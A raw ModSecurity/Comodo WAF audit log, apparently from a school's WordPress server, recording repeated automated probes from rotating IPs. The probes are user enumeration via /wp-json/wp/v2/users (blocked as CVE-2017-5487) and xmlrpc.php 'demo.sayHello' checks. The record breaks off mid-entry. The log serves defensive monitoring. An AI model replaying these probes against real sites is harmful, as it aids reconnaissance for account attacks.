Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85f03940-Z-- --d1412628-A-- [17/May/2025:23:27:17 +0700] aCi45RKi5m5upc8uMd5K6QAAAM4 103.236.140.4 49132 103.236.140.4 8181 --d1412628-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d1412628-C-- demo.sayHello --d1412628-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1412628-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499237309108 14922 (- - -) Stopwatch2: 1747499237309108 14922; combined=23960, p1=371, p2=3324, p3=36, p4=38, p5=10107, sr=64, sw=53, l=0, gc=10031 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1412628-Z-- --20994a42-A-- [17/May/2025:23:27:25 +0700] aCi47QTOsBn9MSWb6WICpgAAAIs 103.236.140.4 49724 103.236.140.4 8181 --20994a42-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20994a42-C-- demo.sayHello --20994a42-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20994a42-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499245875752 4963 (- - -) Stopwatch2: 1747499245875752 4963; combined=3780, p1=604, p2=2968, p3=34, p4=29, p5=86, sr=69, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20994a42-Z-- --e86fea34-A-- [17/May/2025:23:27:40 +0700] aCi4_ATOsBn9MSWb6WIDAQAAAI0 103.236.140.4 50708 103.236.140.4 8181 --e86fea34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.245 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e86fea34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e86fea34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499260539748 2762 (- - -) Stopwatch2: 1747499260539748 2762; combined=1226, p1=413, p2=776, p3=0, p4=0, p5=37, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e86fea34-Z-- --c9e3203e-A-- [17/May/2025:23:27:52 +0700] aCi5CBKi5m5upc8uMd5MGAAAAMA 103.236.140.4 51502 103.236.140.4 8181 --c9e3203e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.245 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c9e3203e-C-- demo.sayHello --c9e3203e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9e3203e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499272037854 5870 (- - -) Stopwatch2: 1747499272037854 5870; combined=4375, p1=624, p2=3477, p3=31, p4=35, p5=135, sr=67, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9e3203e-Z-- --654c385b-A-- [17/May/2025:23:28:46 +0700] aCi5PgTOsBn9MSWb6WIExQAAAIM 103.236.140.4 55364 103.236.140.4 8181 --654c385b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --654c385b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --654c385b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499326267897 2487 (- - -) Stopwatch2: 1747499326267897 2487; combined=1279, p1=469, p2=777, p3=0, p4=0, p5=33, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --654c385b-Z-- --578dc565-A-- [17/May/2025:23:28:53 +0700] aCi5RQTOsBn9MSWb6WIE2AAAAII 103.236.140.4 55866 103.236.140.4 8181 --578dc565-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.189.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.189.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --578dc565-C-- demo.sayHello --578dc565-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --578dc565-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499333556092 7098 (- - -) Stopwatch2: 1747499333556092 7098; combined=5284, p1=691, p2=4340, p3=43, p4=45, p5=99, sr=81, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --578dc565-Z-- --e701d73d-A-- [17/May/2025:23:29:47 +0700] aCi5ewTOsBn9MSWb6WIF_gAAAIM 103.236.140.4 59674 103.236.140.4 8181 --e701d73d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e701d73d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e701d73d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499387594722 3082 (- - -) Stopwatch2: 1747499387594722 3082; combined=1688, p1=497, p2=1154, p3=0, p4=0, p5=37, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e701d73d-Z-- --416ced67-A-- [17/May/2025:23:29:54 +0700] aCi5ghKi5m5upc8uMd5PnAAAAM4 103.236.140.4 60154 103.236.140.4 8181 --416ced67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.145 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --416ced67-C-- demo.sayHello --416ced67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --416ced67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499394760499 5510 (- - -) Stopwatch2: 1747499394760499 5510; combined=4113, p1=521, p2=3364, p3=32, p4=36, p5=95, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --416ced67-Z-- --a3c48546-A-- [17/May/2025:23:30:07 +0700] aCi5j3yxdQCiyU1ENFfSTgAAAAM 103.236.140.4 32800 103.236.140.4 8181 --a3c48546-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3c48546-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3c48546-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499407339577 2424 (- - -) Stopwatch2: 1747499407339577 2424; combined=1029, p1=353, p2=652, p3=0, p4=0, p5=24, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3c48546-Z-- --63bc7767-A-- [17/May/2025:23:30:13 +0700] aCi5lQTOsBn9MSWb6WIG2QAAAIw 103.236.140.4 33258 103.236.140.4 8181 --63bc7767-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.86.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.86.208 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --63bc7767-C-- demo.sayHello --63bc7767-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --63bc7767-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499413933673 7700 (- - -) Stopwatch2: 1747499413933673 7700; combined=5538, p1=734, p2=4519, p3=39, p4=44, p5=119, sr=88, sw=83, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63bc7767-Z-- --12cdf91b-A-- [17/May/2025:23:30:38 +0700] aCi5rnyxdQCiyU1ENFfS4AAAAAs 103.236.140.4 35068 103.236.140.4 8181 --12cdf91b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --12cdf91b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12cdf91b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499438148900 2271 (- - -) Stopwatch2: 1747499438148900 2271; combined=949, p1=306, p2=619, p3=0, p4=0, p5=24, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12cdf91b-Z-- --1026730c-A-- [17/May/2025:23:30:45 +0700] aCi5tXyxdQCiyU1ENFfTHAAAABY 103.236.140.4 35624 103.236.140.4 8181 --1026730c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.151 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1026730c-C-- demo.sayHello --1026730c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1026730c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499445916443 4482 (- - -) Stopwatch2: 1747499445916443 4482; combined=3261, p1=433, p2=2639, p3=30, p4=27, p5=76, sr=58, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1026730c-Z-- --d519b160-A-- [17/May/2025:23:31:16 +0700] aCi51BKi5m5upc8uMd5SFwAAANQ 103.236.140.4 37768 103.236.140.4 8181 --d519b160-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d519b160-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d519b160-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499476656319 2803 (- - -) Stopwatch2: 1747499476656319 2803; combined=1189, p1=481, p2=684, p3=0, p4=0, p5=24, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d519b160-Z-- --e4aa9402-A-- [17/May/2025:23:31:25 +0700] aCi53QTOsBn9MSWb6WII8gAAAIM 103.236.140.4 38348 103.236.140.4 8181 --e4aa9402-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.203 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e4aa9402-C-- demo.sayHello --e4aa9402-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4aa9402-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499485713046 4944 (- - -) Stopwatch2: 1747499485713046 4944; combined=3701, p1=556, p2=2918, p3=31, p4=31, p5=96, sr=66, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4aa9402-Z-- --2fdf192a-A-- [17/May/2025:23:31:26 +0700] aCi53nyxdQCiyU1ENFfUQgAAABE 103.236.140.4 38392 103.236.140.4 8181 --2fdf192a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2fdf192a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fdf192a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499486516487 3622 (- - -) Stopwatch2: 1747499486516487 3622; combined=1605, p1=553, p2=1016, p3=0, p4=0, p5=36, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2fdf192a-Z-- --1f2f7d0a-A-- [17/May/2025:23:31:32 +0700] aCi55HyxdQCiyU1ENFfUjAAAAAs 103.236.140.4 38816 103.236.140.4 8181 --1f2f7d0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1f2f7d0a-C-- demo.sayHello --1f2f7d0a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f2f7d0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499492515669 6272 (- - -) Stopwatch2: 1747499492515669 6272; combined=4637, p1=648, p2=3756, p3=36, p4=41, p5=93, sr=70, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f2f7d0a-Z-- --242ec754-A-- [17/May/2025:23:32:03 +0700] aCi6A-m4kjNN-hEbWjLX3wAAAFc 103.236.140.4 40980 103.236.140.4 8181 --242ec754-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --242ec754-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --242ec754-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s 